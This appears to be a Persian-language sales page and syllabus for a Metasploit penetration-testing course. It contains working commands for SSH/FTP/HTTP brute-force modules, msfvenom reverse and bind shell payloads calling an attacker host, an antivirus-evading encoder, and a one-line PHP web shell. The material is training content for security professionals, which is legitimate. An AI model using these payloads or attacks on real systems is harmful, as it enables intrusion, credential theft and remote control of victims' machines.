

دوره تست نفوذ با متاسپلویت | دوره آموزش Metasploit
1 در انبار
ثبتنام !1,000,000 تومان قیمت اصلی: 1,000,000 تومان بود.500,000 تومانقیمت فعلی: 500,000 تومان.
توضیحات
دوره تست نفوذ با متاسپلویت | Metasploit
بعد از تهیه دوره دقت کنید !
جهت دسترسی به فایل ها و ویدیو های دوره تست نفوذ با متاسپلویت | Metasploit
به قسمت دانلود ها در داشبورد کاربری خود بروید !
برای دانلود بهتر است با IDM در ویندوز و ADM در اندروید اقدام به دانلود کنید و با WinRAR فایل ها را استخراج کنید !
معرفی دوره آموزشی متاسپلویت (Metasploit)
آیا به دنبال یادگیری یک ابزار قدرتمند برای تست نفوذ و ارزیابی امنیت شبکه هستید ؟
دوره آموزشی متاسپلویت (Metasploit) بهترین انتخاب برای شماست ! با شرکت در این دوره، مهارتهای لازم برای استفاده از یکی از پرکاربردترین ابزارهای امنیت سایبری را به دست خواهید آورد.
چرا دوره متاسپلویت
متاسپلویت یک فریمورک تست نفوذ بسیار پیشرفته است که به کاربران امکان میدهد
آسیبپذیریهای سیستمها و شبکهها را شناسایی و بهرهبرداری کنند. این ابزار توسط متخصصان امنیت سایبری در سراسر جهان برای انجام تستهای امنیتی استفاده میشود و دارای کتابخانهای گسترده از اکسپلویتها و ماژولهای مختلف است.

معرفی سرفصلهای دوره متاسپلویت :
فریم ورک متاسپلویت (Metasploit Framework) یکی از قدرتمندترین و پرکاربردترین ابزارهای موجود در زمینه تست نفوذ و ارزیابی امنیت سایبری است. این فریم ورک با ارائه مجموعهای گسترده از ابزارها و ماژولهای متنوع، به متخصصان امنیتی امکان میدهد تا به شناسایی، بهرهبرداری و رفع آسیبپذیریهای موجود در سیستمها و شبکهها بپردازند. متاسپلویت، که توسط شرکت Rapid7 توسعه یافته است، به دلیل انعطافپذیری و قابلیت استفاده در محیطهای مختلف، به یکی از ابزارهای ضروری در جعبهابزار هر کارشناس امنیت تبدیل شده است. با استفاده از متاسپلویت، میتوان حملات واقعی را شبیهسازی کرد، آسیبپذیریهای نرمافزارها و سیستمعاملها را آزمایش کرد و اقدامات امنیتی پیشگیرانهای را برای مقابله با تهدیدات سایبری پیادهسازی نمود. این فریم ورک به خصوص برای کسانی که به دنبال یادگیری عمیقتر مفاهیم امنیتی و بهبود تواناییهای خود در تست نفوذ هستند، یک ابزار بینظیر به شمار میآید.
بررسی تاریخچه ایجاد ابزار متاسپلویت
نصب و راهاندازی Metasploit در سیستمهای عامل مختلف، اولین گام برای شروع کار با این فریم ورک قدرتمند است. در ادامه به روش نصب و راهاندازی Metasploit در دو سیستمعامل محبوب لینوکس و ویندوز میپردازیم.
فریم ورک متاسپلویت (Metasploit Framework) یک ابزار قدرتمند و چندمنظوره است که توسط متخصصان امنیت سایبری برای تست نفوذ و ارزیابی امنیت سیستمها و شبکهها استفاده میشود. در زیر به برخی از کاربردهای اصلی متاسپلویت در تست نفوذ اشاره شده است:
1. شناسایی آسیبپذیریها
متاسپلویت شامل مجموعهای گسترده از اسکنرها و ماژولهای شناسایی است که به تستکنندگان نفوذ امکان میدهد تا آسیبپذیریهای موجود در سیستمها، نرمافزارها و شبکهها را شناسایی کنند. این ابزار میتواند به سرعت نقاط ضعف مختلف را کشف کند و گزارشی از این آسیبپذیریها ارائه دهد.
2. بهرهبرداری از آسیبپذیریها
یکی از قابلیتهای برجسته متاسپلویت، امکان بهرهبرداری (exploitation) از آسیبپذیریهای شناسایی شده است. این فریم ورک دارای کتابخانهای غنی از اکسپلویتها برای آسیبپذیریهای مختلف است که به متخصصان امنیتی اجازه میدهد تا به سیستمهای هدف دسترسی پیدا کنند و به بررسی عمق آسیبپذیریها بپردازند.
3. شبیهسازی حملات واقعی
متاسپلویت به کاربران این امکان را میدهد که حملات واقعی سایبری را شبیهسازی کنند. با استفاده از این فریم ورک، میتوان انواع حملات مانند تزریق SQL، حملات فیشینگ، حملات بر روی سیستمعاملها و نرمافزارهای مختلف را شبیهسازی کرد. این شبیهسازیها به تیمهای امنیتی کمک میکند تا آمادگی لازم برای مقابله با حملات واقعی را به دست آورند.
4. آزمایش و ارزیابی امنیتی
تیمهای امنیتی و تستکنندگان نفوذ میتوانند از متاسپلویت برای ارزیابی امنیتی سیستمها و شبکهها استفاده کنند. این ابزار به آنها امکان میدهد تا نقاط ضعف موجود را شناسایی و بهرهبرداری کنند و سپس به بررسی و تقویت اقدامات امنیتی بپردازند.
5. آموزش و توسعه مهارتها
متاسپلویت یک ابزار عالی برای آموزش و توسعه مهارتهای تست نفوذ و امنیت سایبری است. با استفاده از این فریم ورک، افراد علاقهمند به امنیت سایبری میتوانند تکنیکها و روشهای مختلف حملات و دفاع را یاد بگیرند و مهارتهای خود را در محیطی امن و کنترلشده تمرین کنند.
6. ایجاد و استفاده از ماژولهای سفارشی
یکی دیگر از قابلیتهای متاسپلویت، امکان ایجاد و استفاده از ماژولهای سفارشی است. کاربران میتوانند اکسپلویتها و اسکریپتهای خاص خود را توسعه دهند و آنها را در متاسپلویت به کار بگیرند، که این امر انعطافپذیری و کاربردپذیری این فریم ورک را افزایش میدهد.
با توجه به این کاربردها، متاسپلویت به یکی از ابزارهای اصلی و ضروری در جعبهابزار هر تستکننده نفوذ و متخصص امنیت سایبری تبدیل شده است.
فریم ورک متاسپلویت از چند بخش اصلی تشکیل شده که هر کدام کاربردهای ویژهای در فرآیند تست نفوذ دارند. در ادامه به معرفی مختصر این بخشها میپردازیم:
1. ماژولهای اکسپلویت (Exploits)
این بخش شامل کدهای بهرهبرداری است که برای نفوذ به سیستمهای هدف استفاده میشود. هر ماژول اکسپلویت برای یک آسیبپذیری خاص طراحی شده است.
2. ماژولهای پِیلود (Payloads)
پِیلودها کدهایی هستند که پس از بهرهبرداری اجرا میشوند. این کدها میتوانند شامل Reverse Shell ها، Bind Shell ها و دیگر انواع دسترسیها باشند.
3. ماژولهای کمکی (Auxiliary)
ماژولهای Auxiliary شامل ابزارهایی برای اسکن، جمعآوری اطلاعات و انجام وظایف دیگر هستند که به فرآیند تست نفوذ کمک میکنند.
4. ماژولهای پس از بهرهبرداری (Post-Exploitation)
این ماژولها برای انجام فعالیتهای پس از بهرهبرداری مانند جمعآوری اطلاعات سیستم، استخراج گذرواژهها و حفظ دسترسی به سیستمهای هدف استفاده میشوند.
5. ماژولهای انکودر (Encoders)
انکودرها برای رمزگذاری پِیلودها به کار میروند تا توسط نرمافزارهای امنیتی شناسایی نشوند.
6. ماژولهای نوپتر (Nops)
این ماژولها برای تولید دستورات No-Operation استفاده میشوند که در فرایند بهرهبرداری به پایداری اکسپلویت کمک میکنند.
این بخشها به متاسپلویت امکان میدهند تا یک ابزار جامع و قدرتمند برای تست نفوذ و ارزیابی امنیت سایبری باشد.
فریم ورک متاسپلویت (Metasploit Framework) به طور عمده با استفاده از زبان برنامهنویسی روبی (Ruby) توسعه یافته است. انتخاب روبی به دلیل قابلیتهای فراوان و انعطافپذیری بالای این زبان بوده است. در ادامه به بررسی نقش و مزایای زبان روبی در متاسپلویت میپردازیم:
1. انعطافپذیری بالا
روبی یک زبان برنامهنویسی شیءگرا و انعطافپذیر است که به توسعهدهندگان اجازه میدهد تا کدهای کاربرپسند و قابل خواندن بنویسند. این ویژگی به تیم توسعه متاسپلویت امکان داده تا ابزارهای پیچیده را به صورت ساده و قابل فهم طراحی کنند.
2. سازگاری و توسعه سریع
یکی از مزایای روبی، توانایی توسعه و بروزرسانی سریع کدها است. این قابلیت به تیم متاسپلویت اجازه میدهد تا به سرعت به روز رسانیها و اکسپلویتهای جدید را اضافه کرده و به تغییرات دنیای امنیت سایبری واکنش نشان دهند.
3. پشتیبانی از کتابخانههای مختلف
روبی دارای کتابخانههای متنوعی است که به توسعهدهندگان امکان میدهد تا از ابزارها و منابع مختلف برای توسعه قابلیتهای جدید استفاده کنند. این کتابخانهها به غنای فریم ورک متاسپلویت افزوده و آن را به یکی از جامعترین ابزارهای تست نفوذ تبدیل کردهاند.
4. سهولت در نوشتن اسکریپتهای سفارشی
یکی از دلایل محبوبیت متاسپلویت، امکان نوشتن و استفاده از ماژولها و اسکریپتهای سفارشی است. با استفاده از روبی، کاربران میتوانند به راحتی اسکریپتهای خود را توسعه داده و از آنها در متاسپلویت استفاده کنند.
5. جامعه پشتیبان قوی
زبان روبی دارای یک جامعه فعال و پشتیبان قوی است که منابع و مستندات زیادی را برای یادگیری و حل مشکلات فراهم میکند. این امر به توسعهدهندگان متاسپلویت کمک میکند تا از تجربیات و دانش جامعه بهره ببرند.
نتیجهگیری
استفاده از زبان روبی در توسعه متاسپلویت، این فریم ورک را به یک ابزار قدرتمند، انعطافپذیر و قابل توسعه تبدیل کرده است که به متخصصان امنیت سایبری امکان میدهد تا به طور مؤثر به شناسایی و بهرهبرداری از آسیبپذیریها بپردازند.
معرفی و آشنایی جزیی با زبان برنامه نویسی روبی
فریم ورک متاسپلویت با ارائه ویژگیهای متنوع، به کاربران امکان میدهد تا به طور موثر از آن برای تست نفوذ و ارزیابی امنیت استفاده کنند. در اینجا به آموزش نحوه کار با برخی از ویژگیهای کلیدی این ابزار، مانند جستجو و استفاده از ماژولها، میپردازیم.
1. جستجو در متاسپلویت
متاسپلویت دارای تعداد زیادی ماژول است که شامل اکسپلویتها، پِیلودها، ماژولهای کمکی و دیگر ابزارها میشود. برای جستجو در میان این ماژولها، میتوانید از دستور search
استفاده کنید.
مثال جستجو برای یک اکسپلویت خاص:
msfconsole
search exploit windows
این دستور، تمام اکسپلویتهای مرتبط با ویندوز را نمایش میدهد. شما میتوانید از کلمات کلیدی مختلف برای محدود کردن نتایج جستجو استفاده کنید.
2. اطلاعات در مورد یک ماژول
پس از یافتن ماژول مورد نظر، میتوانید از دستور info
برای دریافت اطلاعات بیشتر در مورد آن ماژول استفاده کنید.
مثال:
info exploit/windows/smb/ms08_067_netapi
این دستور، جزئیات مربوط به اکسپلویت MS08-067 در پروتکل SMB ویندوز را نمایش میدهد.
3. بارگذاری و استفاده از ماژولها
برای بارگذاری و استفاده از یک ماژول، از دستور use
استفاده کنید. سپس میتوانید تنظیمات مورد نیاز را پیکربندی کنید.
مثال:
use exploit/windows/smb/ms08_067_netapi
با اجرای این دستور، اکسپلویت مورد نظر بارگذاری میشود.
استفاده از دستورات سرچ و کار با ماژولها متاسپلویست
ماژولهای کمکی یا Auxiliary در فریم ورک متاسپلویت به شما کمک میکنند تا وظایف مختلفی مانند اسکن، جمعآوری اطلاعات و انجام فعالیتهای قبل و بعد از نفوذ را انجام دهید. در اینجا به آموزش نحوه کار با ماژولهای کمکی مختلف میپردازیم.
1. جستجو و انتخاب ماژول کمکی
برای یافتن ماژولهای کمکی، میتوانید از دستور search
استفاده کنید.
مثال:
msfconsole
search auxiliary scanner
این دستور تمام ماژولهای کمکی مربوط به اسکنر را نمایش میدهد.
2. بارگذاری ماژول کمکی
پس از یافتن ماژول کمکی مورد نظر، از دستور use
برای بارگذاری آن استفاده کنید.
مثال:
use auxiliary/scanner/http/http_version
این دستور، ماژول اسکنر نسخه HTTP را بارگذاری میکند.
3. نمایش گزینههای ماژول کمکی
برای مشاهده گزینههای موجود در ماژول بارگذاری شده، از دستور show options
استفاده کنید.
مثال:
show options
این دستور، تمام گزینههای قابل تنظیم برای ماژول اسکنر HTTP را نمایش میدهد.
4. تنظیم گزینههای ماژول کمکی
برای تنظیم گزینهها، از دستور set
استفاده کنید.
مثال:
set RHOSTS 192.168.1.0/24
set THREADS 10
این دستورها، محدوده آدرسهای IP هدف و تعداد رشتههای موازی را تنظیم میکنند.
5. اجرای ماژول کمکی
پس از تنظیم همه گزینهها، ماژول کمکی را با استفاده از دستور run
اجرا کنید.
مثال:
run
این دستور، ماژول اسکنر HTTP را اجرا کرده و نتایج اسکن را نمایش میدهد.
مثالهای دیگر از ماژولهای کمکی
1. اسکن پورتها با ماژول TCP Port Scanner
بارگذاری ماژول:
use auxiliary/scanner/portscan/tcp
تنظیم گزینهها:
set RHOSTS 192.168.1.0/24
set PORTS 80,443,8080
set THREADS 10
اجرای ماژول:
run
2. شناسایی سرویسها با ماژول Service Discovery
بارگذاری ماژول:
use auxiliary/scanner/discovery/udp_sweep
تنظیم گزینهها:
set RHOSTS 192.168.1.0/24
set THREADS 10
اجرای ماژول:
run
3. جمعآوری اطلاعات با ماژول DNS Enumeration
بارگذاری ماژول:
use auxiliary/gather/enum_dns
تنظیم گزینهها:
set DOMAIN example.com
اجرای ماژول:
run
نتیجهگیری
ماژولهای Auxiliary در متاسپلویت ابزارهای قدرتمندی برای اسکن، جمعآوری اطلاعات و انجام وظایف مختلف قبل و بعد از نفوذ هستند. با استفاده از دستورات ساده و تنظیم گزینههای مختلف، میتوانید به راحتی از این ماژولها برای ارزیابی امنیتی سیستمها و شبکهها استفاده کنید. تمرین و آشنایی با این ماژولها به شما کمک میکند تا از قابلیتهای متاسپلویت به بهترین شکل بهرهبرداری کنید.
حملات بروت فورس (Brute Force) یکی از روشهای متداول برای شکستن گذرواژهها و دسترسی به سیستمها و سرویسهای مختلف است. در فریم ورک متاسپلویت (Metasploit Framework)، ماژولهای متعددی برای انجام حملات بروت فورس وجود دارد که به کاربران امکان میدهد تا گذرواژهها و اطلاعات ورود را با استفاده از روشهای مختلف آزمون و خطا (trial and error) به دست آورند. در اینجا به بررسی نحوه اجرای حملات بروت فورس با استفاده از متاسپلویت میپردازیم.
1. ماژولهای بروت فورس در متاسپلویت
ماژولهای مختلفی در متاسپلویت برای انجام حملات بروت فورس بر روی سرویسهای مختلف وجود دارد. این ماژولها شامل حملات بروت فورس بر روی پروتکلهای SSH، FTP، Telnet، HTTP و غیره هستند.
2. جستجو برای ماژولهای بروت فورس
ابتدا میتوانید برای پیدا کردن ماژولهای بروت فورس، از دستور search
استفاده کنید.
مثال:
msfconsole
search brute
این دستور لیستی از ماژولهای مرتبط با حملات بروت فورس را نمایش میدهد.
3. بارگذاری و تنظیم ماژول بروت فورس
برای بارگذاری یک ماژول بروت فورس، از دستور use
استفاده کنید. سپس میتوانید گزینههای مربوط به ماژول را تنظیم کنید.
مثال: حمله بروت فورس بر روی سرویس SSH
بارگذاری ماژول:
use auxiliary/scanner/ssh/ssh_login
نمایش گزینههای ماژول:
show options
تنظیم گزینهها:
set RHOSTS 192.168.1.100
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
set THREADS 5
در این مثال، RHOSTS
آدرس IP هدف است، USER_FILE
و PASS_FILE
فایلهای متنی حاوی نامهای کاربری و گذرواژهها هستند و THREADS
تعداد درخواستهای موازی همزمان برای حمله را تنظیم میکند.
4. اجرای ماژول بروت فورس
پس از تنظیم گزینهها، میتوانید ماژول بروت فورس را با استفاده از دستور run
اجرا کنید.
مثال:
run
این دستور حمله بروت فورس را آغاز میکند و متاسپلویت شروع به تست نامهای کاربری و گذرواژههای مختلف میکند تا زمانی که دسترسی موفقی حاصل شود یا تمام ترکیبها امتحان شوند.
مثالهای دیگر از حملات بروت فورس
1. حمله بروت فورس بر روی سرویس FTP
بارگذاری ماژول:
use auxiliary/scanner/ftp/ftp_login
تنظیم گزینهها:
set RHOSTS 192.168.1.100
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
set THREADS 5
اجرای ماژول:
run
2. حمله بروت فورس بر روی سرویس HTTP
بارگذاری ماژول:
use auxiliary/scanner/http/http_login
تنظیم گزینهها:
set RHOSTS 192.168.1.100
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
set THREADS 5
اجرای ماژول:
run
نتیجهگیری
حملات بروت فورس یکی از روشهای مؤثر برای دسترسی به سیستمها و سرویسهای مختلف است. فریم ورک متاسپلویت با ارائه ماژولهای متنوع برای انجام این نوع حملات، ابزار قدرتمندی در اختیار متخصصان امنیت سایبری قرار میدهد. با استفاده از دستورات و تنظیمات ساده، میتوانید به راحتی حملات بروت فورس را بر روی سرویسهای مختلف اجرا کرده و امنیت سیستمها را ارزیابی کنید.
msfvenom یکی از ابزارهای قدرتمند و انعطافپذیر در فریم ورک متاسپلویت (Metasploit Framework) است که برای ایجاد و تولید payloadها استفاده میشود. این ابزار، دو ابزار قدیمی msfpayload
و msfencode
را ترکیب کرده و امکانات بیشتری را در یک ابزار جامع فراهم میکند.
ویژگیها و قابلیتهای msfvenom
تولید Payloadهای مختلف: msfvenom قابلیت تولید انواع مختلف payloadها را دارد که شامل payloadهای بایند شل، شل معکوس، و انواع مختلف دسترسیهای مخفیانه است. این payloadها میتوانند برای سیستمعاملها و پلتفرمهای مختلف تولید شوند.
پشتیبانی از فرمتهای خروجی متنوع: این ابزار میتواند payloadها را در فرمتهای خروجی مختلفی مانند فایلهای اجرایی، اسکریپتها، و کدهای منبع تولید کند. برخی از فرمتهای خروجی عبارتند از: exe، elf، apk، raw، و غیره.
رمزگذاری و انکودینگ: msfvenom قابلیت رمزگذاری و انکودینگ payloadها را دارد تا بتوان از تشخیص و شناسایی آنها توسط نرمافزارهای امنیتی جلوگیری کرد. این ویژگی به ویژه در حملات و نفوذها بسیار مهم است.
انعطافپذیری در تنظیمات: کاربران میتوانند تنظیمات مختلفی مانند آدرس IP و پورت برای payloadها تعیین کنند تا به نیازهای خاص خود پاسخ دهند.
نحوه استفاده از msfvenom
برای استفاده از msfvenom، باید از خط فرمان (command line) استفاده کنید. در ادامه به برخی از دستورات و مثالهای کاربردی میپردازیم:
1. تولید یک payload ساده برای شل معکوس TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > shell_reverse_tcp.exe
این دستور یک فایل اجرایی ویندوزی با payload شل معکوس TCP تولید میکند که به آدرس IP 192.168.1.10 و پورت 4444 متصل میشود.
2. تولید یک payload برای لینوکس در فرمت elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf > shell_reverse_tcp.elf
این دستور یک فایل اجرایی لینوکسی با payload شل معکوس TCP تولید میکند.
3. استفاده از انکودینگ برای رمزگذاری payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -f exe > encoded_shell_reverse_tcp.exe
این دستور از انکودر x86/shikata_ga_nai
برای رمزگذاری payload استفاده میکند.
4. لیست کردن payloadهای موجود
msfvenom -l payloads
این دستور لیستی از تمام payloadهای موجود را نمایش میدهد.
5. تولید payload در فرمت raw برای استفاده در اسکریپتها
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw > shell_reverse_tcp.raw
این دستور یک payload در فرمت raw تولید میکند که میتوان از آن در اسکریپتها استفاده کرد.
نتیجهگیری
msfvenom یک ابزار قدرتمند و چندمنظوره برای تولید و انکودینگ payloadها در فریم ورک متاسپلویت است. این ابزار با پشتیبانی از انواع فرمتهای خروجی و قابلیتهای گسترده در تولید و انکودینگ payloadها، به متخصصان امنیت سایبری امکان میدهد تا حملات پیچیده و موثری را طراحی و اجرا کنند. یادگیری و تسلط بر استفاده از msfvenom، یکی از مهارتهای اساسی در تست نفوذ و ارزیابی امنیت سایبری است.
در زمینه تست نفوذ و امنیت سایبری، شل (Shell) به دستوری اشاره دارد که به مهاجم امکان اجرای دستورات بر روی سیستم هدف را میدهد. انواع مختلفی از شلها وجود دارند که هر کدام کاربردهای خاص خود را دارند. در اینجا به معرفی و بررسی برخی از مهمترین انواع شلها میپردازیم.
1. شل معکوس (Reverse Shell)
در شل معکوس، سیستم هدف به ماشین مهاجم متصل میشود. این نوع شل بیشتر در محیطهایی استفاده میشود که سیستم هدف در پشت فایروال یا NAT قرار دارد.
مثال:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > reverse_shell.exe
2. بایند شل (Bind Shell)
در بایند شل، سیستم هدف یک پورت را باز کرده و منتظر میماند تا مهاجم به آن متصل شود. این نوع شل در مواردی استفاده میشود که مهاجم به طور مستقیم به سیستم هدف دسترسی دارد.
مثال:
msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.1.100 LPORT=4444 -f exe > bind_shell.exe
3. مترپرتر شل (Meterpreter Shell)
مترپرتر شل یک شل پیشرفته و پویا است که توسط فریم ورک متاسپلویت ارائه میشود. این شل قابلیتهای زیادی مانند آپلود و دانلود فایلها، اجرا و مدیریت فرآیندها، و جمعآوری اطلاعات سیستم را دارد.
مثال:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > meterpreter_reverse_shell.exe
4. Command Shell
Command Shell یک شل ساده است که به مهاجم اجازه میدهد دستورات سیستمعامل را بر روی سیستم هدف اجرا کند. این شلها سادهترین نوع شلها هستند و معمولاً امکانات پیشرفتهای مانند مترپرتر شل ندارند.
مثال:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.10 LPORT=4444 -f raw > reverse_bash.sh
5. شل وب (Web Shell)
شل وب یک اسکریپت است که بر روی سرور وب قرار میگیرد و به مهاجم اجازه میدهد دستورات را از طریق مرورگر وب اجرا کند. این نوع شلها اغلب در حملات وب سرورها استفاده میشوند.
مثال:
یک اسکریپت PHP ساده برای شل وب:
<?php system($_GET['cmd']); ?>
نتیجهگیری
انواع مختلف شلها ابزارهای قدرتمندی در دست متخصصان تست نفوذ و امنیت سایبری هستند. انتخاب نوع مناسب شل بستگی به محیط و شرایط هدف دارد. آشنایی و تسلط بر استفاده از این شلها میتواند به افزایش اثربخشی حملات و ارزیابیهای امنیتی کمک کند.
ساخت پیلود و تست کردن آنتی ویروس
آنتیویروسها از روشهای مختلفی برای شناسایی و مسدود کردن پیلودهای مخرب استفاده میکنند. این روشها ترکیبی از تکنیکهای ایستا و پویا هستند که به شناسایی تهدیدات و جلوگیری از اجرای آنها در سیستمها کمک میکنند. در ادامه، به بررسی برخی از این روشها میپردازیم.
روش های به چالش کشیدن آنتی ویروس
Nmap (مخفف Network Mapper) یک ابزار قدرتمند و رایگان برای کاوش و ممیزی امنیت شبکه است که توسط Gordon Lyon (Fyodor) توسعه یافته است. این ابزار برای شناسایی دستگاههای موجود در شبکه، کشف پورتهای باز، و شناسایی خدمات و سیستمعاملهای اجراشده بر روی آنها استفاده میشود. Nmap به عنوان یکی از ابزارهای اساسی در تست نفوذ و ارزیابی امنیت شبکهها شناخته میشود.
روش ها دسترسی گرفتن از ویندوز
روش های دور زدن UAC در ویندوز
بررسی دستورات Post Exploitation در ویندوز
روش های مخفی ماندن در ویندوز
روش های جمع آوری اطلاعات از Active Directory
روش های تست نفوذ Active Directory با متاسپلویت
دستورات Post Exploitation در اکتیو دایرکتوری
لترال موومنت (Lateral Movement) در امنیت سایبری به تکنیکها و روشهایی اطلاق میشود که مهاجمان سایبری پس از دستیابی اولیه به یک سیستم، از آنها برای جابجایی در شبکه استفاده میکنند. هدف این روشها معمولاً افزایش سطح دسترسی، دسترسی به سیستمهای حیاتیتر، و در نهایت رسیدن به اهداف اصلی مانند استخراج دادهها یا اجرای باجافزار است.
CVE (Common Vulnerabilities and Exposures) یک سیستم شناسایی و نامگذاری استاندارد برای آسیبپذیریها و اکسپلویتهای امنیتی است. این سیستم توسط موسسه MITRE و با حمایت سازمان امنیت سایبری و زیرساختهای آمریکا (CISA) مدیریت میشود. هدف اصلی CVE این است که یک نامگذاری و توصیف یکتا برای هر آسیبپذیری ارائه دهد، به طوری که این آسیبپذیریها به صورت یکپارچه و قابل فهم برای همه متخصصان امنیتی و توسعهدهندگان نرمافزار در سراسر جهان باشد.
- تلفن های تماس: 09373383489 -09191157418
- ارتباط از طریق تلگرام : N3twork_l0ver@
معرفی ابزاری برای امنیت سایبری
راهنمای گام به گام نصب و راه اندازی Metasploit در لینوکس و ویندوز
ابزاری کلیدی برای شبیهسازی حملات
ویژگیها، کاربردها و مزایا
آموزش کار با فیچرهای ابزار مانند سرچ و استفاده
استفاده از دستورات سرچ و کار با ماژولها
کار با Auxiliary های مختلف
جمع اوری اطلاعات با متاسپلویت
حملات بروت فورس در متاسپلویت
بررسی ابزار msfvenom
ساخت پیلود با msfvenom
بررسی shell ها
چالش آنتی ویروس
چالش آنتی ویروس
کار با nmap در متاسپلویت
بایپس UAC
Post Exploitation در ویندوز
مخفی ماندن در ویندوز
information gathering
تست نفوذ Active Directory با متاسپلویت
Post Exploitation در اکتیو دایرکتوری
Lateral movement با متاسپلویت
اکسپلویت چند CVE
این دوره برای چه کسانی مناسب هست ؟
- دانشجویان رشته های کامپیوتر
- افرادی که قصد ورود به حوزه هک و امنیت را دارند
- مدیران سیستم و مدیران شبکه
- تحلیلگر ریسک/تهدید/آسیب پذیری
- مشاور امنیت فناوری اطلاعات
- پنتسترها
کیفیت ویدیوها چطور هست ؟
تمام ویدیو ها با کیفیت Full HD و صدای با کیفیت همانند ویدیو معرفی دوره می باشد !
کانال اخبار دوره های سایت : رفتن به کانال تلگرام!
نکته : پس از تهیه دوره از پسورد گذاشته شده در لینک های دانلود اقدام به استخراج کنید.
نکته : این دوره در صورت آپدیت تمامی ویدئوهای جدید برای دانشجویان پیشین دوره کاملا رایگان است.
نکته : اگر سوالی دارید میتوانید برای ما کامنت گذاشته و یا از قسمت تماس با ما با ایمیل مدیر با ما ارتباط برقرار کنید.
دوره کالی لینوکس – کاملترین دوره آموزشی PWK کلیک کنید !
مدرسان دوره

سجاد تیموری
نظرات
سوالات و نظراتتون رو با ما به اشتراک بذارید
